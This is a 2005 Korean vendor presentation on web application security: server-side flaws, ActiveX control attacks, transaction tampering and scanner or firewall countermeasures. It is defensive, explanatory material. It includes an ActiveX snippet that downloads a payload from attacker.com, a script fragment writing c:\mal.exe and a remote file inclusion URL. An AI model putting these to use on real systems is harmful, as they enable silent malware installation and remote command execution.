PS ScanW3B 제품의 장점

Similar documents
인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc


AhnLab_template

제목 레이아웃

5th-KOR-SANGFOR NGAF(CC)

[Brochure] KOR_TunA

untitled

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

Windows 8에서 BioStar 1 설치하기

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

untitled

Secure Programming Lecture1 : Introduction

Microsoft Word - src.doc

< FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

게시판 스팸 실시간 차단 시스템

<4D F736F F F696E74202D20B1B3C0B0BBEABEF7C0FCB7ABBCBCB9CCB3AA EB9DABCBAB9CE2E707074>

암호내지

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

Microsoft PowerPoint - 6.pptx

웹서버보안취약점대응및조치 교육사이버안전센터

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

Observational Determinism for Concurrent Program Security

Cloud Friendly System Architecture

PowerPoint Template

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

PowerPoint 프레젠테이션

Ç×°ø¾ÈÀüÁ¤º¸³×Æ®¿öÅ©±¸Ãà¹æ¾È¿¡°üÇÑ¿¬±¸.hwp

PowerPoint 프레젠테이션

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

TGDPX white paper

*****

untitled

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

Cisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2

UDP Flooding Attack 공격과 방어

슬라이드 1

슬라이드 1

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대

PowerPoint Template

PowerPoint Presentation

Smart Home Hacking in Real World

The Pocket Guide to TCP/IP Sockets: C Version

TTA Journal No.157_서체변경.indd

WebKnight를 활용한 IIS 웹서버 보안

ActiveX 취약점 공격 및 방어 기법

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론

학습과정평가영역 학습과정명 인터넷보안 유효기간개시일 구분 o 재평가 þ 신규 유효기간종료일 출석수업기반 2. 학습과정평가영역 평가영역 2.1 운영실적 평가항목 과정운영실적의적합성 평가지표 교육과정운영실적의

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

1아이리포 기술사회 모의고사 참조답안

<4D F736F F F696E74202D D203120C3D6B1D920C1A4BAB8BAB8C8A320C0A7C7F9B0FA20C4A7C7D8BBE7B0ED20B5BFC7E220B1E8C8ABBCAE202E707

<5BB5BFB8EDB4EB2D E4B5D C0A5BDA9C0C720BAD0BCAEB0FA20B4EBC0C020B9E6BEC82E687770>

메뉴얼41페이지-2

*2008년1월호진짜

좀비PC

Æí¶÷4-¼Ö·ç¼Çc03ÖÁ¾š

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>


<4D F736F F F696E74202D20C0A5BDA9C5BDC1F6BDC3BDBAC5DB28BDA9C5A9B8B029BCD2B0B3C0DAB7E15F76312E32315FB5F0C4DCC7C3B7AFBDBA2E707074>

SOLUTION BRIEF 차세대 빅데이터 기반 통합로그관리시스템으자, SIEM 솔루션으로 데이터를 수집/분석/검색 및 추가하고, 효율적인 보안 운영을 실시합니다. 대용량 데이터를 수집하고 처리하는 능력은 사이버 보안에 있어서 통찰력을 제공하는 가장 중요하고, 기초적인

1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3

PowerPoint 프레젠테이션

Bubbles PowerPoint Template

<4D F736F F F696E74202D20315FB9DAC7FCB1D920BACEC0E55FC0CEBCE2BFEB2E707074>

untitled

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

#WI DNS DDoS 공격악성코드분석

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E >

제20회_해킹방지워크샵_(이재석)

untitled

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

슬라이드 1

1. 제품 개요 WeGuardia WIPS V2.0(이하 TOE)은 특정 조직에서 운영되는 무선랜에 대한 지속적인 모니터을 통해 내 외부로부터 발생할 수 있는 각종 침입을 탐지 및 차단하여 내부의 네트워크를 보호하는 무선침입방지시스템이다. TOE의 세부 식별자 및 배포

네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간 약 4천여 고객 사이트에 구축 운영되면서 기술의 안정성과 성능면에서 철저한 시장 검증을 거쳤습니다. 또한 TrusGuard는 단독 기능 또는 복합 기능 구동 시

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

(Microsoft PowerPoint - PSBlackbox_\307\245\301\330\301\246\276\310\274\255_ pptx)

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

2015 년 SW 개발보안교육과정안내

Microsoft PowerPoint - 03-TCP Programming.ppt

Safecode 세부구성도 Web Server Webhack Monitoring Server Safecode Source Module 1 Module 2 Module call Module call Module call Healthcare ( 모듈상태확인 ) Upgrad

SUPEX Leadership 과정 개발완료(보고)

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

[11년 정책연구용역]대중소기업 공동보안체계 연구_최종본_제출용_ hwp

Microsoft Word - CrossSiteScripting[XSS].docx

<32BDBAB8B6C6AEC6F9B1DDC0B6B0C5B7A13130B0E8B8EDBEC8B3BBBCAD2E687770>

Inside Android Applications

PowerPoint 프레젠테이션

레이아웃 1

Interstage5 SOAP서비스 설정 가이드

SKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc

PowerPoint 프레젠테이션

ìœ€íŁ´IP( _0219).xlsx

<4D F736F F F696E74202D D20BEEEC7C3B6F3C0CCBEF0BDBA20BAF1C1EEB4CFBDBA20BCD2B0B32D >

Transcription:

취약점분석의관점에서본 웹보안을위한지침및대응방안 2005 년 10 월 13 일

1 1. 개요 2. 취약점? 1. 웹서버에서의취약점 2. 사용자 PC에서의취약점 3. 대응방안 4. 맺음말

1. 개요 2 보안은해킹으로부터 웹취약점파악에촛점 창과방패의싸움 수많은 URL 을사람이일일히점검하는것은불가능 자동화된도구가필요

1-1. 1. 회사소개 3 회사명 대표자 패닉시큐리티 신용재 www.panicsecurity.com 주요연혁 2004.05 설립 / 2005.01 산티웜스캐너배포 / 2005.04 벤처기업 연락처 (02) 2026-0890 / syj@panicsecurity.com / 017-549-5765 사업분야 웹취약점분석스캐너 / 웹방화벽 기술적취약점분석컨설팅 주요고객

1-2. 침해사고현황 4 인터넷침해사고동향및분석월보, KISA, 2005.09 피싱 (Phishing) : 정상적인웹서버를해킹하여위장사이트를개설한후, 인터넷이용자들이금융정보등을빼내는신종사기수법으로 Bank Fraud, Scam 이라고도함

5 1-3. 웹어플리케이션취약점현황 최근의네트워크해킹은시스템의취약점을 이용한공격보다는웹어플리케이션공격에집중되고있습니다. IP Access Port Access HTTP Firewall Known DoS Attack 이것은많은웹어플리케이션들이보안에취약한형태로개발되어해킹방법이손쉬우며, 웹이란특성상해킹흔적이거의남지않는다는점때문입니다. 일반적으로웹기반의침해사고가발생하는이유는웹응용프로그램의설계시에데이터베이스접근, 관리자인증및사용자인증, 웹응용프로그램의설계방식에대한보안성검토가이루어지지않기때문에발생합니다. Pattern Based Attack SQL Injectio Buffer n overflow Worm IDS, IPS etc WEB Application Vulnerability Common Cross Site Script 75% 이상의사이버공격과인터넷보안침해사고는인터넷웹어플리케이션 취약점을이용하여발생한다. - 미국 Gartner Group 2002-

1-4. 웹관련보안솔루션현황 종류기능제품명비고 서버보안 ( 시큐어OS) 전자서명인증, 파일암복호, 접근통제, 침입탐지, 권한분리등의여러가지보안기술로서버시스템보호. - 시큐브 의 시큐브 TOS - 레드게이트의 레드캐슬 암호화 (+ 전자서명 ) - HTTP 프로토콜에서 Plain Text 로전달되는메시지및데이터를암호화하여스니핑 ( 훔쳐보기 ) 방지기능 - 전자서명으로데이터의악의적위변조방지기능 - 소프트포럼의 XecureWeb - 이니텍의 INISAFE - 어플리케이션레벨의취약점은탐지및방어불가능 인증 (PKI, 생체 ) 사용자확인과정인인증의강도를높이기위하여도용하기쉬운 ID/PWD 외에다른매체사용 - 소프트포럼의 XecureWeb - 이니텍의 INISAFE 웹어플리케이션보안 2 가지솔루션 : 웹스캐너및웹방화벽 - 웹프로그래밍취약점 / 오류점검 : 웹스캐너 - 비정상적인 HTTP 요청거부 : 웹방화벽 -패닉시큐리티의 PS ScanW3B -WatchFire의 AppScan -KAVADO 의 ScanDo 웹어플리케이션보안솔루션 주민번호, 카드번호등개인정보노출여부점검 ( 컨텐츠필터링 ) 6

2. 취약점? 7 웹서버 (WAS), 웹서버의 OS, 네트워크장비의취약점이아닌 웹어플리케이션의취약점!! 버그! 웹서버측취약점 SQL Injection XSS (Cross-site Script) File Upload File Download Put Method 인증우회등등 Etc 사용자측취약점 ActiveX 컨트롤취약점공격 클라이언트 / 서버취약점공격 Transaction Tampering

2-1-1. 1. 서버측 : 주요취약점 8 1) 개발자의실수로남는불필요한파일.bak,.back과같은백업파일 Sqlnet.log, WS_FTP.log 와같은로그파일 2) 알려진 (Well-Known) 취약점 웹서버자체취약점 ( 아파치, IIS 및각종WAS 서버 ) 서버관리자페이지, WebDAV 페이지의노출 3) 파라메터변조 Get 메소드, Post 메소드 Hidden Field

2-1-2. 2. 서버측 : 파라메터변조공격 9 http://www.abc.com/read.jsp?no=3&name=abc.zip http://www.abc.com/read.jsp?no=xxx&name=abc.zip SQL Injection : 데이터베이스열람, 명령실행 XSS (Cross-Site Script) : 피싱공격, 쿠키획득 File Download : 서버내모든파일획득

2-1-3. 서버측 : 주요취약점 10 1) File Upload : 실행파일이업로드되면? 웹서버에서명령실행 Reverse Connection : DMZ 에경유통로를설치하여내부망침입 2) 해커의실행파일 Include 3) PUT Method 4) 기타 웹서버에서명령실행 /zboard/write.php?dir=http://my.abc.com/~hack&command=ls 실행파일업로드 인증우회, 쿠키변조등등 산티웜

11

2-1-4. 서버측 : 해킹데모동영상 12 SQL Injection 데이터베이스열람 서버측명령어실행 XSS (Cross-site Scripting) 을이용한피싱

13 2-2-1. 사용자측 : ActiveX 취약점 - 개요 중국발해킹사고, 언론에이슈화된인터넷뱅킹취약점모두 ActiveX 컨트롤취약점을이용 봇, 스파이웨어역시 ActiveX 컨트롤취약점을이용해 PC 에자동으로설치되고전파 ActiveX 컨트롤취약점개요 애드웨어제작자 취약점을이용해애드웨어설치 ( 사용자모르게 ) 컨트롤배포 컨트롤배포기관의서비스이용 산업스파이 악의적공격자 취약점을이용해 PC 내기밀자료유출 취약점을이용해 PC 해킹 컨트롤설치 뱅킹, 금융서비스고객

14 2-2-2. 2. 사용자측 : ActiveX 취약점 - 세부내용 ActiveX 컨트롤을이용한 PC해킹여부를진단은모든 ActiveX 컨트롤에대해수행되어야합니다. 따라서해당서비스는 ActiveX 컨트롤의관리와취약점에대한심화된관리가필요로합니다. 로컬자원접근예 수행범위 UpdateModule() method 기능을악용해정상파일대신해킹툴설치 로컬자원접근 정보수집 보안컨트롤보안성진단 임의의폴더의파일접근 ( 읽기 / 쓰기 ) 임의의레지스트리값접근 ( 읽기 / 쓰기 ) 임의의프로세스접근 ( 실행 / 종료 ) 시스템정보노출가능성 쿠키정보노출가능성 이벤트노출가능성 tamper resistance 체크 키보드보안제품 PC 방화벽 안티바이러스제품 <OBJECT classid='clsid:xxxxxxxxname='control'> <PARAM NAME="url" VALUE="http://www.attacker.com/adware.zip"> </OBJECT> <script> if(control=null && typeof(control)!= "undefined" l) { try { control.updatemodule();; } catch(e) { } } </script>

15 2-2-3. 사용자측 : ActiveX 취약점 - 진단사례 공인인증서의취약점을이용해인터넷뱅킹사용자 PC 를해킹하는것이가능할수있습니다. 아래화면은 인터넷뱅킹사용자 PC 를해킹한다음해킹툴을설치하는그림입니다. 공인인증서컨트롤취약점을이용한 PC 해킹 취약점을이용한해킹툴자동설치

2-2-5. 사용자측 : ActiveX 취약점 - 진단사례 (2) 비표준웹환경은현재의보안성강화를위해사용되는일반화된기술이지만, 검증받지않은보안 S/W는오히려서비스의보안성을약화시키는원인이될수있습니다. 바이너리파일획득가능 / 조작 홈페이지접속 OCX 다운요청 OCX 다운로드 OCX 실행보안체크 다운요청조작가능 보안체크무력화 OCX 실행코드 OCX 전송 보안정상확인 민원서류조작가능 프린터체크 서류출력 서류발급 / 열람 Client PC WEB SERVER 16

17 2-2-6. 사용자측 : Transaction tampering - 개요 로그인, 계좌이체, 계좌이체, 암호해독, 전문조작, 고객정보조회등에서발생하는트랜잭션에대해트랜잭션위, 변조공격 (transaction tampering) 이가능할수있습니다. Transaction tampering 기법을통해트랜잭션관련취약점을원천적으로제거하는노력이필요합니다. Transaction tampering 개요 네트워크레벨점검 Network packet sniffing Man in the middle attack replay attack 웹어플리케이션레벨점검 Debugging Input value modification Cookie injection Transaction Tampering 불법적인금융거래 계좌이체 계좌조회 각종인증우회암호화해독 암호화알고리즘해독 로그인패킷분석 이체분석 연동어플리케이션레벨점검 Credit card application Mobile application Banking application 불법적인권한획득 패스워드없이로그인 관리자권한획득 session hijacking

18 2-2-7. Transaction tampering - 세부내용 (1) Transaction tampering 기법중네트워크레벨진단부분은아래와같습니다. 네트워크레벨진단 자체제작한 session hijacking 진단툴 로그인시공인인증서체크우회 공격가능구간분석 암호화구간분석 공격가능구간분석 패킷분석 통신프로토콜분석 암호화해독 데이터구조분석 패킷조작 Man in the middle attack Replay attack Replace attack

19 2-2-8. Transaction tampering - 세부내용 (2) 빌링시스템진단중연동어플리케이션진단부분은아래와같습니다. 연동어플리케이션레벨진단 지불시스템연동취약점 공격가능구간분석 암호화구간분석 연동어플리케이션구조분석 인터페이스분석 어플리케이션간통신방법분석 어플리케이션내트랜잭션처리구조분석 트랜잭션조작 결제요청트랜잭션조작 결제승인트랜잭션조작 결제취소트랜잭션조작

20 2-2-9. Transaction tampering - 진단사례 (1) A 사쇼핑몰결제트랜잭션을조작해물품결재대금을임의로수정할수있었으며모든상품을 신용카드결제가능최소금액인 1,000 원에구입할수있었습니다. 결재트랜잭션상의가격조작

21 2-2-10. Transaction tampering - 진단사례 (2) 암호화되어전송되는패킷을해독할수있었습니다. 입찰서버의암호화된결재트랜잭션해독 암호화된암호화된패킷패킷 해독한해독한결과 EXAMPLE JAf9xtVnw8BRbIiph8Cmwg==

22 2-2-11. Transaction tampering - 진단사례 (3) 정상적인트랜잭션을조작하거나불법적인트랜잭션을발생시켜패스워드없이로그인할수있었습니다. 트랜잭션조작을통한로그인 EXAMPLE

23 2-2-12. 클라이언트 / 서버취약점분석 - 개요 게임프로그램등웹환경이아닌일반통신어플리케이션에대해서도보안성검토의수행이필요로합니다. 클라이언트 / 서버취약점개요 SERVICE VICTIM 1. 1. 서비스서비스인증인증 2. 2. 서비스서비스요청요청 Network 1. 1. 서비스인증 2. 서비스요청 Attacker iframe 조작백도어, 패킷전문 ( 電文 ) 내역감청등

24 2-2-13. 클라이언트 / 서버취약점분석 - 세부내용 클라이언트, 서버어플리케이션설계및구현상보안취약점의분석이필요로합니다. 취약점의분석은소스코드분석과리버스엔지니어링을통한분석으로나눌수있으며, 악의적기능조작이실제로가능할경우, 심각한서비스의혼란을가져올수있습니다. 악의적기능조작 수행내역 트랜잭션조작 은행의경우기업뱅킹용어플리케이션 증권사의경우 HTS 공격의예 각종게임해킹방지툴의기능을무력화한후디버깅, 메모리검색 권한획득 PC 권한획득 서버권한획득 tamper resistance check 프로세스 / 메모리접근및조작 안티디버깅기법적용여부 메모리암호화적용여부 클라이언트취약점을이용한 PC 해킹예 ( 스크립트삽입공격 ) Set objstream = Server.CreateObject("ADODB.Stream") objstream.open objstream.type = adtypebinary objstream.loadfromfile strfilepath objstream.savetofile "c:\mal.exe", 2

25 3. 대응방안 창 방패? 블랙해커 화이트해커 ( 보안담당자 ) 웹의경우사이트마다설계 / 개발방법이상이 인공지능적인취약점여부의판단이요구됨 일관적으로적용할수있는솔루션부족

3.1 웹보안고려요소 26 웹사이트의기능설계뿐아니라, 설계시보안성고려가요구되며, 개발후에도기능검수뿐아니라보안검수가요구됩니다. 개발및기획단계에서의보안성고려 사용자인증및각종 Argument 의입력정당성여부의검증 데이터베이스설정정보의악의적추출가능성검증 보안조직에서의웹어플리케이션에대한지속적보안성검증및감사 개발자가보안프로그래밍구현능력이있는가? 웹서비스데몬및 OS 형태에대한보안고려를통한웹어플리케이션보안을수행하는가? 사용자인증및각종입력매개변수 (Argument) 에대한필터링이효과적으로수행되는가? SQL Injection, XSS(Cross Site Script) 등을통한불법적프로세스의권한획득가능성이없는가? 사용자의 Query 에따른데이터베이스설정정보를가져오는과정에서의 Cookie Spoofing 및 Session Replay 를통한타사용자정보의추출이가능하지는않은가? 지속적으로진화하며, 개발및지속적유지보수가일어나는웹어플리케이션에대한보안성검증및감사의수행이보안조직에의해검토되는가?

3.2 웹보안대책 27 웹보안대책은기본적으로웹보안프로그래밍에의한구현이 Best Practice 라고할수있으나, 전문웹보안개발자의절대적부족과지속적인웹서비스의개편과진화에따라수정시지속적으로보안문제의발생이불가피하기때문에웹취약점스캐너와웹방화벽을이용한웹취약점방어대책의구현이필요합니다. 웹보안대책? 방안 1 : 웹취약점점검도구의도입 - 점검도구를활용한지속적웹소스수정 - 수작업진행시시간및비용상승 - 네트워크성능저하및오탐없는근본적대책 - Secure Coding 이된경우에는추가대책이필요없음방안 2 : 웹방화벽도입 - 기존웹의수정없는방어대책 - 웹성능저하및오탐가능성내포 - 금융권에서는기술적검증이더요구됨 - 웹서비스기능제한존재 ( 파일업로드등 ) 안전한웹보안대책 1. 웹보안프로그래밍 2. 취약점스캐너활용 3. 웹방화벽도입 4. 웹보안컨설팅을통한 보안성검증

3.3 웹스캐너 28 웹브라우져기반으로자동화된모의공격 미국 Watchfire 社의 AppScan 미국 SpiDynamics 社의 WebInspect 이스라엘 Kavado 社의 ScanDo 패닉시큐리티의 PS ScanW3B( 스캔웹 )

(1) AppScan 29

(2) WebInspect 30

(3) ScanDo 31

(4) PS ScanW3B( 스캔웹 ) - 패닉시큐리티 32

3.4 웹방화벽 33 아직은여러가지형태 / 여러가지방식 / 여러가지방법이혼재되어있음 각각장단점 H/W 타입 S/W 타입 Host 방식 : 독립프로세스 ( 실제동작은 H/W와유사 ) Agent 방식 : 웹서버확장 Positive : 허용되는 HTTP 요청을기억 (URL) Negative : 거부패턴을기반으로공격탐지

IV. 맺음말 34 취약점분석의관점에서본웹보안 서버측어플리케이션취약점 사용자측프로그램취약점 대응솔루션방안 보안프로그래밍 : 보안검수가요구됨웹스캐너 / 웹방화벽 질문 & 답변